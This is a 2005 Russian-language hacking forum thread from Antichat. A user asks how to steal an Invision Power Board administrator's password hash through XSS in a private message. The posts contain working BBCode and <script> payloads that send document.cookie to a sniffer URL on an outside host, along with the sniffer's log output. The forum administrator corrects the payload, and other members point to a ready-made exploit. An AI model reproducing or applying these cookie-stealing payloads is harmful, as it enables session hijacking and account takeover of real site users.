ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Вопрос про проведению атаки класса XSS, в форуме Invison Power Board
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про проведению атаки класса XSS, в форуме Invison Power Board
  #1  
Старый 31.05.2005, 17:55
Аватар для badboy
badboy
Banned
Регистрация: 14.03.2005
Сообщений: 21
Провел на форуме:
99047

Репутация: -2
Red face Вопрос про проведению атаки класса XSS, в форуме Invison Power Board
НАРОД СРОЧНО ПОМОГИТЕ!!!КОРОЧЕ НАШЁЛ ФОРУМ Invison Power Board.

Когда в приватном сообщении отправляю :

[COLOR=]` style=background:url(javascript:alert()) [/COLOR]

То при прочтении это письма выбрасывается окошко,где ничего не написано.

Когда вставлю :

[COLOR=]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]


То при прочтении его,ничего в письме не написано,а в логах античата написан IP,но не мой,но моей страны,а так же ничего больше не написано в логах :

[Tue May 31 17:39:19 2005] IP=62.148.156.202 SITE=
REFERER=
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.54u1 [en]

Вот такое сообщение.Пожалуйста напишите как преобразовать,чтоб заполучить хэш.Тоесть что добавить или чё делать,чтоб при отправке кода админу,я бы получил в логах снифера хэш пароля.

ПОЖАЛУЙСТА ПОМОГИТЕ!!!!!1
 
Ответить с цитированием

  #2  
Старый 31.05.2005, 18:30
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Цитата:
[COLOR=]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]
Если нет элемента (картинки) с номером 68, то не сработает ...
попробуй
Код:
images[0].src=
 
Ответить с цитированием

  #3  
Старый 31.05.2005, 18:33
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Бля не мучайся скачай эксплойт с securitylab.ru и всё.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #4  
Старый 31.05.2005, 18:39
Аватар для badboy
badboy
Banned
Регистрация: 14.03.2005
Сообщений: 21
Провел на форуме:
99047

Репутация: -2
По умолчанию
SanyaX можешь дать мне ссылку где скачать эксплойт
 
Ответить с цитированием

  #5  
Старый 31.05.2005, 18:40
Аватар для badboy
badboy
Banned
Регистрация: 14.03.2005
Сообщений: 21
Провел на форуме:
99047

Репутация: -2
По умолчанию
ЧеГевара ты что написал images[0].src= Это вместо той картинки вставить?
 
Ответить с цитированием

  #6  
Старый 31.05.2005, 19:41
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию
Все изображения в хтмл-документе представляются через массив images, который в свою очередь является свойством document-объекта. Изображение получает номер, так принято, что первое изображение получает 0, второе 1, третье 2 и т.д.

В примере взятом с http://antichat.ru/sniff/
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Создается новый Image-объект с именем img ... Затем определяется адрес изображения, представляемое через обект img ( а src - обязательный атрибут, указывающий URL рисунка (с) справочник =)) + через cgi-запрос передается содержавние cookies для текущего документа ...
Ситуация с твоим примером аналогична, за исключением лишь того факта, что используется уже существующий Image-объект ... Но если он не будет найден на странице, то это вызовет ошибку ...
 
Ответить с цитированием

  #7  
Старый 31.05.2005, 22:40
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию
А какая вкрсия инвижена? если <2.0.4 то тебе сюда
http://rst.void.ru/download/r57ipb2.txt
смысл парицца с xss?
 
Ответить с цитированием

  #8  
Старый 02.06.2005, 15:19
Аватар для Loo
Loo
Новичок
Регистрация: 01.06.2005
Сообщений: 12
Провел на форуме:
20529

Репутация: 0
По умолчанию
Grrl
извини... а мона тупой вопрос?? а как кмопилировать сплойт?? где взять прогу или что вообще как, можешь объяснить?? плиз..
 
Ответить с цитированием

  #9  
Старый 02.06.2005, 16:07
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию
Перл это не компилируемый язык,а интерпретируемый.
 
Ответить с цитированием

  #10  
Старый 02.06.2005, 16:29
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию
специалисты утверждают что вопреки расхожему мнению, перл - компилируемый
(не придираясь к словам, а так, в кач-ве интересного факта)
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final 0verfe1 Форумы 7 07.01.2006 03:23
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про заливку шелла в Invision Power Board DiNo Форумы 14 03.03.2005 13:40
Сколько полей в таблице ibf_topics в форуме Invision Power Board 1.3.1? LittleLamer Форумы 2 29.01.2005 03:25
Вопрос про восстановление паролей в Invision Power Board rHoM Форумы 2 08.12.2004 14:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ